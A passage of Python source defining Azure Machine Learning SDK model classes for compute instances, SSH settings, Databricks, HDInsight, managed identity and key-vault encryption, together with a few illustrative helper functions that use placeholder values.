:type operation_time: ~datetime.datetime
:param operation_status: Operation status. Possible values include: "InProgress", "Succeeded",
"CreateFailed", "StartFailed", "StopFailed", "RestartFailed", "ReimageFailed", "DeleteFailed".
:type operation_status: str or ~azure.mgmt.machinelearningservices.models.OperationStatus
"""
_attribute_map = {
'operation_name': {'key': 'operationName', 'type': 'str'},
'operation_time': {'key': 'operationTime', 'type': 'iso-8601'},
'operation_status': {'key': 'operationStatus', 'type': 'str'},
}
def __init__(
self,
*,
operation_name: Optional[Union[str, "OperationName"]] = None,
operation_time: Optional[datetime.datetime] = None,
operation_status: Optional[Union[str, "OperationStatus"]] = None,
**kwargs
):
super(ComputeInstanceLastOperation, self).__init__(**kwargs)
self.operation_name = operation_name
self.operation_time = operation_time
self.operation_status = operation_status
class ComputeInstanceProperties(msrest.serialization.Model):
"""Compute Instance properties.
Variables are only populated by the server, and will be ignored when sending a request.
:param vm_size: Virtual Machine Size.
:type vm_size: str
:param subnet: Virtual network subnet resource ID the compute nodes belong to.
:type subnet: ~azure.mgmt.machinelearningservices.models.ResourceId
:param application_sharing_policy: Policy for sharing applications on this compute instance
among users of parent workspace. If Personal, only the creator can access applications on this
compute instance. When Shared, any workspace user can access applications on this instance
depending on his/her assigned role. Possible values include: "Personal", "Shared". Default
value: "Shared".
:type application_sharing_policy: str or
~azure.mgmt.machinelearningservices.models.ApplicationSharingPolicy
:param ssh_settings: Specifies policy and settings for SSH access.
:type ssh_settings: ~azure.mgmt.machinelearningservices.models.ComputeInstanceSshSettings
:ivar connectivity_endpoints: Describes all connectivity endpoints available for this
ComputeInstance.
:vartype connectivity_endpoints:
~azure.mgmt.machinelearningservices.models.ComputeInstanceConnectivityEndpoints
:ivar applications: Describes available applications and their endpoints on this
ComputeInstance.
:vartype applications:
list[~azure.mgmt.machinelearningservices.models.ComputeInstanceApplication]
:ivar created_by: Describes information on user who created this ComputeInstance.
:vartype created_by: ~azure.mgmt.machinelearningservices.models.ComputeInstanceCreatedBy
:ivar errors: Collection of errors encountered on this ComputeInstance.
:vartype errors: list[~azure.mgmt.machinelearningservices.models.MachineLearningServiceError]
:ivar state: The current state of this ComputeInstance. Possible values include: "Creating",
"CreateFailed", "Deleting", "Running", "Restarting", "JobRunning", "SettingUp", "SetupFailed",
"Starting", "Stopped", "Stopping", "UserSettingUp", "UserSetupFailed", "Unknown", "Unusable".
:vartype state: str or ~azure.mgmt.machinelearningservices.models.ComputeInstanceState
:ivar last_operation: The last operation on ComputeInstance.
:vartype last_operation:
~azure.mgmt.machinelearningservices.models.ComputeInstanceLastOperation
"""
_validation = {
'connectivity_endpoints': {'readonly': True},
'applications': {'readonly': True},
'created_by': {'readonly': True},
'errors': {'readonly': True},
'state': {'readonly': True},
'last_operation': {'readonly': True},
}
_attribute_map = {
'vm_size': {'key': 'vmSize', 'type': 'str'},
'subnet': {'key': 'subnet', 'type': 'ResourceId'},
'application_sharing_policy': {'key': 'applicationSharingPolicy', 'type': 'str'},
'ssh_settings': {'key': 'sshSettings', 'type': 'ComputeInstanceSshSettings'},
'connectivity_endpoints': {'key': 'connectivityEndpoints', 'type': 'ComputeInstanceConnectivityEndpoints'},
'applications': {'key': 'applications', 'type': '[ComputeInstanceApplication]'},
'created_by': {'key': 'createdBy', 'type': 'ComputeInstanceCreatedBy'},
'errors': {'key': 'errors', 'type': '[MachineLearningServiceError]'},
'state': {'key': 'state', 'type': 'str'},
'last_operation': {'key': 'lastOperation', 'type': 'ComputeInstanceLastOperation'},
}
def __init__(
self,
*,
vm_size: Optional[str] = None,
subnet: Optional["ResourceId"] = None,
application_sharing_policy: Optional[Union[str, "ApplicationSharingPolicy"]] = "Shared",
ssh_settings: Optional["ComputeInstanceSshSettings"] = None,
**kwargs
):
super(ComputeInstanceProperties, self).__init__(**kwargs)
self.vm_size = vm_size
self.subnet = subnet
self.application_sharing_policy = application_sharing_policy
self.ssh_settings = ssh_settings
self.connectivity_endpoints = None
self.applications = None
self.created_by = None
self.errors = None
self.state = None
self.last_operation = None
class ComputeInstanceSshSettings(msrest.serialization.Model):
"""Specifies policy and settings for SSH access.
Variables are only populated by the server, and will be ignored when sending a request.
:param ssh_public_access: State of the public SSH port. Possible values are: Disabled -
Indicates that the public ssh port is closed on this instance. Enabled - Indicates that the
public ssh port is open and accessible according to the VNet/subnet policy if applicable.
Possible values include: "Enabled", "Disabled". Default value: "Disabled".
:type ssh_public_access: str or ~azure.mgmt.machinelearningservices.models.SshPublicAccess
:ivar admin_user_name: Describes the admin user name.
:vartype admin_user_name: str
:ivar ssh_port: Describes the port for connecting through SSH.
:vartype ssh_port: int
:param admin_public_key: Specifies the SSH rsa public key file as a string. Use "ssh-keygen -t
rsa -b 2048" to generate your SSH key pairs.
:type admin_public_key: str
"""
_validation = {
'admin_user_name': {'readonly': True},
'ssh_port': {'readonly': True},
}
_attribute_map = {
'ssh_public_access': {'key': 'sshPublicAccess', 'type': 'str'},
'admin_user_name': {'key': 'adminUserName', 'type': 'str'},
'ssh_port': {'key': 'sshPort', 'type': 'int'},
'admin_public_key': {'key': 'adminPublicKey', 'type': 'str'},
}
def __init__(
self,
*,
ssh_public_access: Optional[Union[str, "SshPublicAccess"]] = "Disabled",
admin_public_key: Optional[str] = None,
**kwargs
):
super(ComputeInstanceSshSettings, self).__init__(**kwargs)
self.ssh_public_access = ssh_public_access
self.admin_user_name = None
self.ssh_port = None
self.admin_public_key = admin_public_key
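# Illustrative usage sketch (not part of the generated SDK): shows how the two
# compute-instance models above might be combined when requesting a compute
# instance with SSH enabled. The VM size, key material, and sharing policy below
# are assumptions for demonstration only.
def _example_compute_instance_properties():
    ssh = ComputeInstanceSshSettings(
        ssh_public_access="Enabled",                   # open the public SSH port
        admin_public_key="ssh-rsa AAAA... user@host",  # placeholder key material
    )
    return ComputeInstanceProperties(
        vm_size="STANDARD_DS3_V2",              # assumed VM size
        application_sharing_policy="Personal",  # only the creator can access apps
        ssh_settings=ssh,
    )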
class Resource(msrest.serialization.Model):
"""Azure Resource Manager resource envelope.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Specifies the resource ID.
:vartype id: str
:ivar name: Specifies the name of the resource.
:vartype name: str
:param identity: The identity of the resource.
:type identity: ~azure.mgmt.machinelearningservices.models.Identity
:param location: Specifies the location of the resource.
:type location: str
:ivar type: Specifies the type of the resource.
:vartype type: str
:param tags: A set of tags. Contains resource tags defined as key/value pairs.
:type tags: dict[str, str]
:param sku: The sku of the workspace.
:type sku: ~azure.mgmt.machinelearningservices.models.Sku
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'identity': {'key': 'identity', 'type': 'Identity'},
'location': {'key': 'location', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'sku': {'key': 'sku', 'type': 'Sku'},
}
def __init__(
self,
*,
identity: Optional["Identity"] = None,
location: Optional[str] = None,
tags: Optional[Dict[str, str]] = None,
sku: Optional["Sku"] = None,
**kwargs
):
super(Resource, self).__init__(**kwargs)
self.id = None
self.name = None
self.identity = identity
self.location = location
self.type = None
self.tags = tags
self.sku = sku
class ComputeResource(Resource):
"""Machine Learning compute object wrapped into ARM resource envelope.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Specifies the resource ID.
:vartype id: str
:ivar name: Specifies the name of the resource.
:vartype name: str
:param identity: The identity of the resource.
:type identity: ~azure.mgmt.machinelearningservices.models.Identity
:param location: Specifies the location of the resource.
:type location: str
:ivar type: Specifies the type of the resource.
:vartype type: str
:param tags: A set of tags. Contains resource tags defined as key/value pairs.
:type tags: dict[str, str]
:param sku: The sku of the workspace.
:type sku: ~azure.mgmt.machinelearningservices.models.Sku
:param properties: Compute properties.
:type properties: ~azure.mgmt.machinelearningservices.models.Compute
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'identity': {'key': 'identity', 'type': 'Identity'},
'location': {'key': 'location', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'sku': {'key': 'sku', 'type': 'Sku'},
'properties': {'key': 'properties', 'type': 'Compute'},
}
def __init__(
self,
*,
identity: Optional["Identity"] = None,
location: Optional[str] = None,
tags: Optional[Dict[str, str]] = None,
sku: Optional["Sku"] = None,
properties: Optional["Compute"] = None,
**kwargs
):
super(ComputeResource, self).__init__(identity=identity, location=location, tags=tags, sku=sku, **kwargs)
self.properties = properties
class Databricks(Compute):
"""A DataFactory compute.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param compute_type: Required. The type of compute. Constant filled by server. Possible values
include: "AKS", "AmlCompute", "ComputeInstance", "DataFactory", "VirtualMachine", "HDInsight",
"Databricks", "DataLakeAnalytics".
:type compute_type: str or ~azure.mgmt.machinelearningservices.models.ComputeType
:param compute_location: Location for the underlying compute.
:type compute_location: str
:ivar provisioning_state: The provisioning state of the cluster. Possible values include:
 "Unknown", "Updating", "Creating", "Deleting", "Succeeded", "Failed", "Canceled".
:vartype provisioning_state: str or
~azure.mgmt.machinelearningservices.models.ProvisioningState
:param description: The description of the Machine Learning compute.
:type description: str
:ivar created_on: The date and time when the compute was created.
:vartype created_on: ~datetime.datetime
:ivar modified_on: The date and time when the compute was last modified.
:vartype modified_on: ~datetime.datetime
:param resource_id: ARM resource id of the underlying compute.
:type resource_id: str
:ivar provisioning_errors: Errors during provisioning.
:vartype provisioning_errors:
list[~azure.mgmt.machinelearningservices.models.MachineLearningServiceError]
:ivar is_attached_compute: Indicates whether the compute was provisioned by the user and brought
 from outside (true), or provisioned by the machine learning service (false).
:vartype is_attached_compute: bool
:param properties:
:type properties: ~azure.mgmt.machinelearningservices.models.DatabricksProperties
"""
_validation = {
'compute_type': {'required': True},
'provisioning_state': {'readonly': True},
'created_on': {'readonly': True},
'modified_on': {'readonly': True},
'provisioning_errors': {'readonly': True},
'is_attached_compute': {'readonly': True},
}
_attribute_map = {
'compute_type': {'key': 'computeType', 'type': 'str'},
'compute_location': {'key': 'computeLocation', 'type': 'str'},
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'modified_on': {'key': 'modifiedOn', 'type': 'iso-8601'},
'resource_id': {'key': 'resourceId', 'type': 'str'},
'provisioning_errors': {'key': 'provisioningErrors', 'type': '[MachineLearningServiceError]'},
'is_attached_compute': {'key': 'isAttachedCompute', 'type': 'bool'},
'properties': {'key': 'properties', 'type': 'DatabricksProperties'},
}
def __init__(
self,
*,
compute_location: Optional[str] = None,
description: Optional[str] = None,
resource_id: Optional[str] = None,
properties: Optional["DatabricksProperties"] = None,
**kwargs
):
super(Databricks, self).__init__(compute_location=compute_location, description=description, resource_id=resource_id, **kwargs)
self.compute_type = 'Databricks' # type: str
self.properties = properties
class DatabricksComputeSecrets(ComputeSecrets):
"""Secrets related to a Machine Learning compute based on Databricks.
All required parameters must be populated in order to send to Azure.
:param compute_type: Required. The type of compute. Constant filled by server. Possible values
include: "AKS", "AmlCompute", "ComputeInstance", "DataFactory", "VirtualMachine", "HDInsight",
"Databricks", "DataLakeAnalytics".
:type compute_type: str or ~azure.mgmt.machinelearningservices.models.ComputeType
:param databricks_access_token: Access token for the Databricks account.
:type databricks_access_token: str
"""
_validation = {
'compute_type': {'required': True},
}
_attribute_map = {
'compute_type': {'key': 'computeType', 'type': 'str'},
'databricks_access_token': {'key': 'databricksAccessToken', 'type': 'str'},
}
def __init__(
self,
*,
databricks_access_token: Optional[str] = None,
**kwargs
):
super(DatabricksComputeSecrets, self).__init__(**kwargs)
self.compute_type = 'Databricks' # type: str
self.databricks_access_token = databricks_access_token
class DatabricksProperties(msrest.serialization.Model):
"""DatabricksProperties.
:param databricks_access_token: Databricks access token.
:type databricks_access_token: str
"""
_attribute_map = {
'databricks_access_token': {'key': 'databricksAccessToken', 'type': 'str'},
}
def __init__(
self,
*,
databricks_access_token: Optional[str] = None,
**kwargs
):
super(DatabricksProperties, self).__init__(**kwargs)
self.databricks_access_token = databricks_access_token
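# Illustrative usage sketch (not part of the generated SDK): attaching an existing
# Databricks workspace as a compute target by wrapping the Databricks model above
# in an ARM ComputeResource envelope. The resource id, location, and token value
# are placeholders, not real identifiers.
def _example_databricks_compute_resource():
    databricks = Databricks(
        description="Attached Databricks workspace",
        resource_id=(
            "/subscriptions/<subscription-id>/resourceGroups/<rg>"
            "/providers/Microsoft.Databricks/workspaces/<workspace>"
        ),
        properties=DatabricksProperties(databricks_access_token="<access-token>"),
    )
    return ComputeResource(location="eastus", properties=databricks)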
class DataFactory(Compute):
"""A DataFactory compute.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param compute_type: Required. The type of compute. Constant filled by server. Possible values
include: "AKS", "AmlCompute", "ComputeInstance", "DataFactory", "VirtualMachine", "HDInsight",
"Databricks", "DataLakeAnalytics".
:type compute_type: str or ~azure.mgmt.machinelearningservices.models.ComputeType
:param compute_location: Location for the underlying compute.
:type compute_location: str
:ivar provisioning_state: The provisioning state of the cluster. Possible values include:
 "Unknown", "Updating", "Creating", "Deleting", "Succeeded", "Failed", "Canceled".
:vartype provisioning_state: str or
~azure.mgmt.machinelearningservices.models.ProvisioningState
:param description: The description of the Machine Learning compute.
:type description: str
:ivar created_on: The date and time when the compute was created.
:vartype created_on: ~datetime.datetime
:ivar modified_on: The date and time when the compute was last modified.
:vartype modified_on: ~datetime.datetime
:param resource_id: ARM resource id of the underlying compute.
:type resource_id: str
:ivar provisioning_errors: Errors during provisioning.
:vartype provisioning_errors:
list[~azure.mgmt.machinelearningservices.models.MachineLearningServiceError]
:ivar is_attached_compute: Indicates whether the compute was provisioned by the user and brought
 from outside (true), or provisioned by the machine learning service (false).
:vartype is_attached_compute: bool
"""
_validation = {
'compute_type': {'required': True},
'provisioning_state': {'readonly': True},
'created_on': {'readonly': True},
'modified_on': {'readonly': True},
'provisioning_errors': {'readonly': True},
'is_attached_compute': {'readonly': True},
}
_attribute_map = {
'compute_type': {'key': 'computeType', 'type': 'str'},
'compute_location': {'key': 'computeLocation', 'type': 'str'},
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'modified_on': {'key': 'modifiedOn', 'type': 'iso-8601'},
'resource_id': {'key': 'resourceId', 'type': 'str'},
'provisioning_errors': {'key': 'provisioningErrors', 'type': '[MachineLearningServiceError]'},
'is_attached_compute': {'key': 'isAttachedCompute', 'type': 'bool'},
}
def __init__(
self,
*,
compute_location: Optional[str] = None,
description: Optional[str] = None,
resource_id: Optional[str] = None,
**kwargs
):
super(DataFactory, self).__init__(compute_location=compute_location, description=description, resource_id=resource_id, **kwargs)
self.compute_type = 'DataFactory' # type: str
class DataLakeAnalytics(Compute):
"""A DataLakeAnalytics compute.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param compute_type: Required. The type of compute. Constant filled by server. Possible values
include: "AKS", "AmlCompute", "ComputeInstance", "DataFactory", "VirtualMachine", "HDInsight",
"Databricks", "DataLakeAnalytics".
:type compute_type: str or ~azure.mgmt.machinelearningservices.models.ComputeType
:param compute_location: Location for the underlying compute.
:type compute_location: str
:ivar provisioning_state: The provisioning state of the cluster. Possible values include:
 "Unknown", "Updating", "Creating", "Deleting", "Succeeded", "Failed", "Canceled".
:vartype provisioning_state: str or
~azure.mgmt.machinelearningservices.models.ProvisioningState
:param description: The description of the Machine Learning compute.
:type description: str
:ivar created_on: The date and time when the compute was created.
:vartype created_on: ~datetime.datetime
:ivar modified_on: The date and time when the compute was last modified.
:vartype modified_on: ~datetime.datetime
:param resource_id: ARM resource id of the underlying compute.
:type resource_id: str
:ivar provisioning_errors: Errors during provisioning.
:vartype provisioning_errors:
list[~azure.mgmt.machinelearningservices.models.MachineLearningServiceError]
:ivar is_attached_compute: Indicates whether the compute was provisioned by the user and brought
 from outside (true), or provisioned by the machine learning service (false).
:vartype is_attached_compute: bool
:param properties:
:type properties: ~azure.mgmt.machinelearningservices.models.DataLakeAnalyticsProperties
"""
_validation = {
'compute_type': {'required': True},
'provisioning_state': {'readonly': True},
'created_on': {'readonly': True},
'modified_on': {'readonly': True},
'provisioning_errors': {'readonly': True},
'is_attached_compute': {'readonly': True},
}
_attribute_map = {
'compute_type': {'key': 'computeType', 'type': 'str'},
'compute_location': {'key': 'computeLocation', 'type': 'str'},
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'modified_on': {'key': 'modifiedOn', 'type': 'iso-8601'},
'resource_id': {'key': 'resourceId', 'type': 'str'},
'provisioning_errors': {'key': 'provisioningErrors', 'type': '[MachineLearningServiceError]'},
'is_attached_compute': {'key': 'isAttachedCompute', 'type': 'bool'},
'properties': {'key': 'properties', 'type': 'DataLakeAnalyticsProperties'},
}
def __init__(
self,
*,
compute_location: Optional[str] = None,
description: Optional[str] = None,
resource_id: Optional[str] = None,
properties: Optional["DataLakeAnalyticsProperties"] = None,
**kwargs
):
super(DataLakeAnalytics, self).__init__(compute_location=compute_location, description=description, resource_id=resource_id, **kwargs)
self.compute_type = 'DataLakeAnalytics' # type: str
self.properties = properties
class DataLakeAnalyticsProperties(msrest.serialization.Model):
"""DataLakeAnalyticsProperties.
:param data_lake_store_account_name: DataLake Store Account Name.
:type data_lake_store_account_name: str
"""
_attribute_map = {
'data_lake_store_account_name': {'key': 'dataLakeStoreAccountName', 'type': 'str'},
}
def __init__(
self,
*,
data_lake_store_account_name: Optional[str] = None,
**kwargs
):
super(DataLakeAnalyticsProperties, self).__init__(**kwargs)
self.data_lake_store_account_name = data_lake_store_account_name
class EncryptionProperty(msrest.serialization.Model):
"""EncryptionProperty.
All required parameters must be populated in order to send to Azure.
:param status: Required. Indicates whether or not the encryption is enabled for the workspace.
Possible values include: "Enabled", "Disabled".
:type status: str or ~azure.mgmt.machinelearningservices.models.EncryptionStatus
:param key_vault_properties: Required. Customer Key vault properties.
:type key_vault_properties: ~azure.mgmt.machinelearningservices.models.KeyVaultProperties
"""
_validation = {
'status': {'required': True},
'key_vault_properties': {'required': True},
}
_attribute_map = {
'status': {'key': 'status', 'type': 'str'},
'key_vault_properties': {'key': 'keyVaultProperties', 'type': 'KeyVaultProperties'},
}
def __init__(
self,
*,
status: Union[str, "EncryptionStatus"],
key_vault_properties: "KeyVaultProperties",
**kwargs
):
super(EncryptionProperty, self).__init__(**kwargs)
self.status = status
self.key_vault_properties = key_vault_properties
class ErrorDetail(msrest.serialization.Model):
"""Error detail information.
All required parameters must be populated in order to send to Azure.
:param code: Required. Error code.
:type code: str
:param message: Required. Error message.
:type message: str
"""
_validation = {
'code': {'required': True},
'message': {'required': True},
}
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(
self,
*,
code: str,
message: str,
**kwargs
):
super(ErrorDetail, self).__init__(**kwargs)
self.code = code
self.message = message
class ErrorResponse(msrest.serialization.Model):
"""Error response information.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar code: Error code.
:vartype code: str
:ivar message: Error message.
:vartype message: str
:ivar details: An array of error detail objects.
:vartype details: list[~azure.mgmt.machinelearningservices.models.ErrorDetail]
"""
_validation = {
'code': {'readonly': True},
'message': {'readonly': True},
'details': {'readonly': True},
}
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
'details': {'key': 'details', 'type': '[ErrorDetail]'},
}
def __init__(
self,
**kwargs
):
super(ErrorResponse, self).__init__(**kwargs)
self.code = None
self.message = None
self.details = None
class EstimatedVMPrice(msrest.serialization.Model):
"""The estimated price info for using a VM of a particular OS type, tier, etc.
All required parameters must be populated in order to send to Azure.
:param retail_price: Required. The price charged for using the VM.
:type retail_price: float
:param os_type: Required. Operating system type used by the VM. Possible values include:
"Linux", "Windows".
:type os_type: str or ~azure.mgmt.machinelearningservices.models.VMPriceOSType
:param vm_tier: Required. The type of the VM. Possible values include: "Standard",
"LowPriority", "Spot".
:type vm_tier: str or ~azure.mgmt.machinelearningservices.models.VMTier
"""
_validation = {
'retail_price': {'required': True},
'os_type': {'required': True},
'vm_tier': {'required': True},
}
_attribute_map = {
'retail_price': {'key': 'retailPrice', 'type': 'float'},
'os_type': {'key': 'osType', 'type': 'str'},
'vm_tier': {'key': 'vmTier', 'type': 'str'},
}
def __init__(
self,
*,
retail_price: float,
os_type: Union[str, "VMPriceOSType"],
vm_tier: Union[str, "VMTier"],
**kwargs
):
super(EstimatedVMPrice, self).__init__(**kwargs)
self.retail_price = retail_price
self.os_type = os_type
self.vm_tier = vm_tier
class EstimatedVMPrices(msrest.serialization.Model):
"""The estimated price info for using a VM.
All required parameters must be populated in order to send to Azure.
:param billing_currency: Required. Three-letter code specifying the currency of the VM price.
Example: USD. Possible values include: "USD".
:type billing_currency: str or ~azure.mgmt.machinelearningservices.models.BillingCurrency
:param unit_of_measure: Required. The unit of time measurement for the specified VM price.
Example: OneHour. Possible values include: "OneHour".
:type unit_of_measure: str or ~azure.mgmt.machinelearningservices.models.UnitOfMeasure
:param values: Required. The list of estimated prices for using a VM of a particular OS type,
tier, etc.
:type values: list[~azure.mgmt.machinelearningservices.models.EstimatedVMPrice]
"""
_validation = {
'billing_currency': {'required': True},
'unit_of_measure': {'required': True},
'values': {'required': True},
}
_attribute_map = {
'billing_currency': {'key': 'billingCurrency', 'type': 'str'},
'unit_of_measure': {'key': 'unitOfMeasure', 'type': 'str'},
'values': {'key': 'values', 'type': '[EstimatedVMPrice]'},
}
def __init__(
self,
*,
billing_currency: Union[str, "BillingCurrency"],
unit_of_measure: Union[str, "UnitOfMeasure"],
values: List["EstimatedVMPrice"],
**kwargs
):
super(EstimatedVMPrices, self).__init__(**kwargs)
self.billing_currency = billing_currency
self.unit_of_measure = unit_of_measure
self.values = values
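# Illustrative sketch (not part of the generated SDK): EstimatedVMPrices is normally
# returned by the service, but constructing it shows how the required enum-like
# parameters accept plain strings. All prices below are made-up sample values.
def _example_estimated_vm_prices():
    return EstimatedVMPrices(
        billing_currency="USD",
        unit_of_measure="OneHour",
        values=[
            EstimatedVMPrice(retail_price=0.22, os_type="Linux", vm_tier="Standard"),
            EstimatedVMPrice(retail_price=0.05, os_type="Linux", vm_tier="LowPriority"),
        ],
    )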
class HDInsight(Compute):
"""A HDInsight compute.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param compute_type: Required. The type of compute. Constant filled by server. Possible values
include: "AKS", "AmlCompute", "ComputeInstance", "DataFactory", "VirtualMachine", "HDInsight",
"Databricks", "DataLakeAnalytics".
:type compute_type: str or ~azure.mgmt.machinelearningservices.models.ComputeType
:param compute_location: Location for the underlying compute.
:type compute_location: str
:ivar provisioning_state: The provisioning state of the cluster. Possible values include:
 "Unknown", "Updating", "Creating", "Deleting", "Succeeded", "Failed", "Canceled".
:vartype provisioning_state: str or
~azure.mgmt.machinelearningservices.models.ProvisioningState
:param description: The description of the Machine Learning compute.
:type description: str
:ivar created_on: The date and time when the compute was created.
:vartype created_on: ~datetime.datetime
:ivar modified_on: The date and time when the compute was last modified.
:vartype modified_on: ~datetime.datetime
:param resource_id: ARM resource id of the underlying compute.
:type resource_id: str
:ivar provisioning_errors: Errors during provisioning.
:vartype provisioning_errors:
list[~azure.mgmt.machinelearningservices.models.MachineLearningServiceError]
:ivar is_attached_compute: Indicates whether the compute was provisioned by the user and brought
 from outside (true), or provisioned by the machine learning service (false).
:vartype is_attached_compute: bool
:param properties:
:type properties: ~azure.mgmt.machinelearningservices.models.HDInsightProperties
"""
_validation = {
'compute_type': {'required': True},
'provisioning_state': {'readonly': True},
'created_on': {'readonly': True},
'modified_on': {'readonly': True},
'provisioning_errors': {'readonly': True},
'is_attached_compute': {'readonly': True},
}
_attribute_map = {
'compute_type': {'key': 'computeType', 'type': 'str'},
'compute_location': {'key': 'computeLocation', 'type': 'str'},
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'modified_on': {'key': 'modifiedOn', 'type': 'iso-8601'},
'resource_id': {'key': 'resourceId', 'type': 'str'},
'provisioning_errors': {'key': 'provisioningErrors', 'type': '[MachineLearningServiceError]'},
'is_attached_compute': {'key': 'isAttachedCompute', 'type': 'bool'},
'properties': {'key': 'properties', 'type': 'HDInsightProperties'},
}
def __init__(
self,
*,
compute_location: Optional[str] = None,
description: Optional[str] = None,
resource_id: Optional[str] = None,
properties: Optional["HDInsightProperties"] = None,
**kwargs
):
super(HDInsight, self).__init__(compute_location=compute_location, description=description, resource_id=resource_id, **kwargs)
self.compute_type = 'HDInsight' # type: str
self.properties = properties
class HDInsightProperties(msrest.serialization.Model):
"""HDInsightProperties.
:param ssh_port: Port open for ssh connections on the master node of the cluster.
:type ssh_port: int
:param address: Public IP address of the master node of the cluster.
:type address: str
:param administrator_account: Admin credentials for master node of the cluster.
:type administrator_account:
~azure.mgmt.machinelearningservices.models.VirtualMachineSshCredentials
"""
_attribute_map = {
'ssh_port': {'key': 'sshPort', 'type': 'int'},
'address': {'key': 'address', 'type': 'str'},
'administrator_account': {'key': 'administratorAccount', 'type': 'VirtualMachineSshCredentials'},
}
def __init__(
self,
*,
ssh_port: Optional[int] = None,
address: Optional[str] = None,
administrator_account: Optional["VirtualMachineSshCredentials"] = None,
**kwargs
):
super(HDInsightProperties, self).__init__(**kwargs)
self.ssh_port = ssh_port
self.address = address
self.administrator_account = administrator_account
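# Illustrative sketch (not part of the generated SDK): attaching an existing
# HDInsight cluster as a compute target. The resource id, address, and port are
# placeholders; administrator_account is omitted here because its credential
# model is defined elsewhere in this module.
def _example_hdinsight_compute():
    return HDInsight(
        resource_id=(
            "/subscriptions/<subscription-id>/resourceGroups/<rg>"
            "/providers/Microsoft.HDInsight/clusters/<cluster>"
        ),
        properties=HDInsightProperties(ssh_port=22, address="10.0.0.4"),
    )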
class Identity(msrest.serialization.Model):
"""Identity for the resource.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar principal_id: The principal ID of resource identity.
:vartype principal_id: str
:ivar tenant_id: The tenant ID of resource.
:vartype tenant_id: str
:param type: Required. The identity type. Possible values include: "SystemAssigned",
"UserAssigned", "SystemAssigned,UserAssigned", "None".
:type type: str or ~azure.mgmt.machinelearningservices.models.ResourceIdentityType
:param user_assigned_identities: The list of user identities associated with the resource. The user
identity dictionary key references will be ARM resource ids in the form:
'/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ManagedIdentity/userAssignedIdentities/{identityName}'.
:type user_assigned_identities: dict[str,
~azure.mgmt.machinelearningservices.models.ComponentsSgqdofSchemasIdentityPropertiesUserassignedidentitiesAdditionalproperties]
"""
_validation = {
'principal_id': {'readonly': True},
'tenant_id': {'readonly': True},
'type': {'required': True},
}
_attribute_map = {
'principal_id': {'key': 'principalId', 'type': 'str'},
'tenant_id': {'key': 'tenantId', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'user_assigned_identities': {'key': 'userAssignedIdentities', 'type': '{ComponentsSgqdofSchemasIdentityPropertiesUserassignedidentitiesAdditionalproperties}'},
}
def __init__(
self,
*,
type: Union[str, "ResourceIdentityType"],
user_assigned_identities: Optional[Dict[str, "ComponentsSgqdofSchemasIdentityPropertiesUserassignedidentitiesAdditionalproperties"]] = None,
**kwargs
):
super(Identity, self).__init__(**kwargs)
self.principal_id = None
self.tenant_id = None
self.type = type
self.user_assigned_identities = user_assigned_identities
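# Illustrative sketch (not part of the generated SDK): a system-assigned managed
# identity for a workspace or compute resource. principal_id and tenant_id are
# read-only and therefore not passed here.
def _example_system_assigned_identity():
    return Identity(type="SystemAssigned")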
class KeyVaultProperties(msrest.serialization.Model):
"""KeyVaultProperties.
All required parameters must be populated in order to send to Azure.
:param key_vault_arm_id: Required. The ArmId of the keyVault where the customer-owned
 encryption key is present.
:type key_vault_arm_id: str
:param key_identifier: Required. Key vault uri to access the encryption key.
:type key_identifier: str
:param identity_client_id: For future use - The client id of the identity which will be used to
access key vault.
:type identity_client_id: str
"""
_validation = {
'key_vault_arm_id': {'required': True},
'key_identifier': {'required': True},
}
_attribute_map = {
'key_vault_arm_id': {'key': 'keyVaultArmId', 'type': 'str'},
'key_identifier': {'key': 'keyIdentifier', 'type': 'str'},
'identity_client_id': {'key': 'identityClientId', 'type': 'str'},
}
def __init__(
self,
*,
key_vault_arm_id: str,
key_identifier: str,
identity_client_id: Optional[str] = None,
**kwargs
):
super(KeyVaultProperties, self).__init__(**kwargs)
self.key_vault_arm_id = key_vault_arm_id
self.key_identifier = key_identifier
self.identity_client_id = identity_client_id
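# Illustrative sketch (not part of the generated SDK): enabling customer-managed-key
# encryption by pairing EncryptionProperty (defined above) with KeyVaultProperties.
# The vault ARM id and key identifier are placeholders.
def _example_cmk_encryption():
    return EncryptionProperty(
        status="Enabled",
        key_vault_properties=KeyVaultProperties(
            key_vault_arm_id=(
                "/subscriptions/<subscription-id>/resourceGroups/<rg>"
                "/providers/Microsoft.KeyVault/vaults/<vault>"
            ),
            key_identifier="https://<vault>.vault.azure.net/keys/<key>/<version>",
        ),
    )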
